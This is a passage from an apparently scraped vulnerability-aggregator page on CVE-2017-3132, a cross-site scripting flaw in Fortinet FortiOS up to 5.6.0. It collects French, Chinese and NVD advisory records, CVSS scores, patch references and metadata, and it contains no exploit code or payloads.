        "id": "VHN-111335"
      },
      {
        "date": "2017-07-28T00:00:00",
        "db": "BID",
        "id": "100009"
      },
      {
        "date": "2017-10-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "date": "2017-07-28T19:22:22",
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "date": "2017-07-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      },
      {
        "date": "2017-09-12T02:29:00.233000",
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-111335"
      },
      {
        "date": "2017-07-28T00:00:00",
        "db": "BID",
        "id": "100009"
      },
      {
        "date": "2017-10-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      },
      {
        "date": "2024-11-21T03:24:53.903000",
        "db": "NVD",
        "id": "CVE-2017-3132"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Fortinet FortiOS Vulnerable to cross-site scripting",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007778"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "143543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201707-1510"
      }
    ],
    "trust": 0.7
  }
}

CERTFR-2017-AVI-240

Vulnerability from certfr_avis

De multiples vulnérabilités ont été corrigées dans Fortinet FortiOS. Elles permettent à un attaquant de provoquer une injection de code indirecte à distance (XSS).

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

FortiOS versions antérieures à 5.6.1

Impacted products

	Vendor	Product	Description

References

Title

Publication Time

gsd-2017-3132

Vulnerability from gsd

Modified

2023-12-13 01:21

Details

Aliases

CVE-2017-3132

Aliases

CVE-2017-3132

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2017-3132",
    "description": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.",
    "id": "GSD-2017-3132",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2017-3132"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2017-3132"
      ],
      "details": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.",
      "id": "GSD-2017-3132",
      "modified": "2023-12-13T01:21:16.015895Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@fortinet.com",
        "DATE_PUBLIC": "2017-09-11T00:00:00",
        "ID": "CVE-2017-3132",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Fortinet FortiOS",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "FortiOS versions 5.6.0 and earlier"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Fortinet, Inc."
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "Execute unauthorized code or commands"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "100009",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/100009"
          },
          {
            "name": "1039020",
            "refsource": "SECTRACK",
            "url": "http://www.securitytracker.com/id/1039020"
          },
          {
            "name": "https://fortiguard.com/advisory/FG-IR-17-104",
            "refsource": "CONFIRM",
            "url": "https://fortiguard.com/advisory/FG-IR-17-104"
          },
          {
            "name": "42388",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/42388/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.6.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@fortinet.com",
          "ID": "CVE-2017-3132"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-79"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://fortiguard.com/advisory/FG-IR-17-104",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://fortiguard.com/advisory/FG-IR-17-104"
            },
            {
              "name": "42388",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/42388/"
            },
            {
              "name": "1039020",
              "refsource": "SECTRACK",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securitytracker.com/id/1039020"
            },
            {
              "name": "100009",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/100009"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      },
      "lastModifiedDate": "2017-09-14T13:53Z",
      "publishedDate": "2017-09-12T02:29Z"
    }
  }
}

cnvd-2017-26262

Vulnerability from cnvd

Title

Fortinet FortiOS跨站脚本漏洞（CNVD-2017-26262）

Description

Fortinet FortiOS是美国飞塔（Fortinet）公司开发的一套专用于FortiGate网络安全平台上的安全操作系统。 Fortinet FortiOS中存在跨站脚本漏洞。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。

Severity

中

Patch Name

Fortinet FortiOS跨站脚本漏洞（CNVD-2017-26262）的补丁

Patch Description

Fortinet FortiOS是美国飞塔（Fortinet）公司开发的一套专用于FortiGate网络安全平台上的安全操作系统。 Fortinet FortiOS中存在跨站脚本漏洞。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description

目前厂商已发布升级补丁以修复漏洞，补丁获取链接： http://fortiguard.com/psirt/FG-IR-17-104

Reference

http://seclists.org/bugtraq/2017/Jul/68 http://www.securityfocus.com/bid/100009

Impacted products

Name
Fortinet FortiOS <=5.6.0

Show details on source website

JSON

To clipboard

{
  "bids": {
    "bid": {
      "bidNumber": "100009"
    }
  },
  "cves": {
    "cve": {
      "cveNumber": "CVE-2017-3132"
    }
  },
  "description": "Fortinet FortiOS\u662f\u7f8e\u56fd\u98de\u5854\uff08Fortinet\uff09\u516c\u53f8\u5f00\u53d1\u7684\u4e00\u5957\u4e13\u7528\u4e8eFortiGate\u7f51\u7edc\u5b89\u5168\u5e73\u53f0\u4e0a\u7684\u5b89\u5168\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nFortinet FortiOS\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5728\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u4efb\u610f\u811a\u672c\u4ee3\u7801\u3002",
  "discovererName": "Patryk Bogdan of Secorda",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a\r\nhttp://fortiguard.com/psirt/FG-IR-17-104",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2017-26262",
  "openTime": "2017-09-12",
  "patchDescription": "Fortinet FortiOS\u662f\u7f8e\u56fd\u98de\u5854\uff08Fortinet\uff09\u516c\u53f8\u5f00\u53d1\u7684\u4e00\u5957\u4e13\u7528\u4e8eFortiGate\u7f51\u7edc\u5b89\u5168\u5e73\u53f0\u4e0a\u7684\u5b89\u5168\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nFortinet FortiOS\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5728\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u4efb\u610f\u811a\u672c\u4ee3\u7801\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Fortinet FortiOS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff08CNVD-2017-26262\uff09\u7684\u8865\u4e01",
  "products": {
    "product": "Fortinet FortiOS \u003c=5.6.0"
  },
  "referenceLink": "http://seclists.org/bugtraq/2017/Jul/68\r\nhttp://www.securityfocus.com/bid/100009",
  "serverity": "\u4e2d",
  "submitTime": "2017-07-31",
  "title": "Fortinet FortiOS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff08CNVD-2017-26262\uff09"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2017-3132 (GCVE-0-2017-3132)

Vulnerability from cvelistv5

ghsa-6pmp-vh39-v2fh

Vulnerability from github

fkie_cve-2017-3132

Vulnerability from fkie_nvd

var-201709-0476

Vulnerability from variot

Vendor: Fortinet (www.fortinet.com)

CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133

Date: 28.07.2016

Author: Patryk Bogdan (@patryk_bogdan)

1 - Http request:

1 - Http response:

2 - Http request:

2 - Http response:

CERTFR-2017-AVI-240

Vulnerability from certfr_avis

Solution

gsd-2017-3132

Vulnerability from gsd

cnvd-2017-26262

Vulnerability from cnvd

Tags

Sightings

Nomenclature